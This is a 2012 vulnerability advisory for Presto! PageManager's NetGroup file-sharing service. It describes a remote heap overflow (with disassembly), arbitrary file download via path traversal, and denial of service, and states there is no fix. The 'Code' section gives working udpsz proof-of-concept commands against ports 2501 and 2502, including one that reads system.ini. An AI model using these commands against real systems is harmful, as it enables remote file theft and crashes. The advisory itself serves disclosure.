presto! pagemanager 9.01 - Multiple Vulnerabilities

#######################################################################

                             Luigi Auriemma

Application:  Presto! PageManager
              http://www.newsoftinc.com/products/product_page.php?P_Id=5
Versions:     <= 9.01
Platforms:    Windows, MacOSX
Bugs:         A] Heap-overflow
              B] Arbitray files downloading
              C] Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Presto! PageManager is a management software for scanners and it's
provided by default also by some hardware vendors (like Epson).

It's bundled with a (manual) server program called NetGroup for remote
files transfer:
"The Network Group function helps you exchange files with your group
members. Everyone in the working group should have Presto! PageManager
running."


#######################################################################

=======
2) Bugs
=======

----------------
A] Heap-overflow
----------------

Buffer overflow on port 2502 while copying of the message string into a
small heap buffer:

  004151BE  |. 33C0           XOR EAX,EAX
  004151C0  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]  ; strlen
  004151C2  |. F7D1           NOT ECX
  004151C4  |. 2BF9           SUB EDI,ECX
  004151C6  |. 6A FF          PUSH -1
  004151C8  |. 8BC1           MOV EAX,ECX
  004151CA  |. 8BF7           MOV ESI,EDI
  004151CC  |. 8BFA           MOV EDI,EDX
  004151CE  |. C1E9 02        SHR ECX,2                     ; heap overflow
  004151D1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  004151D3  |. 8BC8           MOV ECX,EAX
  004151D5  |. 83E1 03        AND ECX,3
  004151D8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  004151DA  |. 8D4C24 14      LEA ECX,DWORD PTR SS:[ESP+14]
  004151DE  |. E8 1B370000    CALL <JMP.&MFC42.#5572>
  004151E3  |. 8B5424 10      MOV EDX,DWORD PTR SS:[ESP+10]
  004151E7  |. 8D4C24 2C      LEA ECX,DWORD PTR SS:[ESP+2C]
  004151EB  |. 51             PUSH ECX
  004151EC  |. 52             PUSH EDX
  004151ED  |. E8 56350000    CALL <JMP.&PMCommon._GetFileExtName>
  004151F2  |. BE 94014200    MOV ESI,NetGroup.00420194     ;  ASCII ".NSOFT"


-----------------------------
B] Arbitray files downloading
-----------------------------

The software allows downloading any file.


--------------------
C] Denial of Service
--------------------

Just a simple (auto)termination caused by the impossibility of
allocating the amount of memory specified by the client.

There is also a "division by zero" when specifying a file size of 0
bytes.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip

A]
  udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
  just a quick test, exist better ways that show code execution

B]
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
  or
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8

C]
  udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
  or
  udpsz -T -C "00000100 ffffffff" SERVER 2502 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################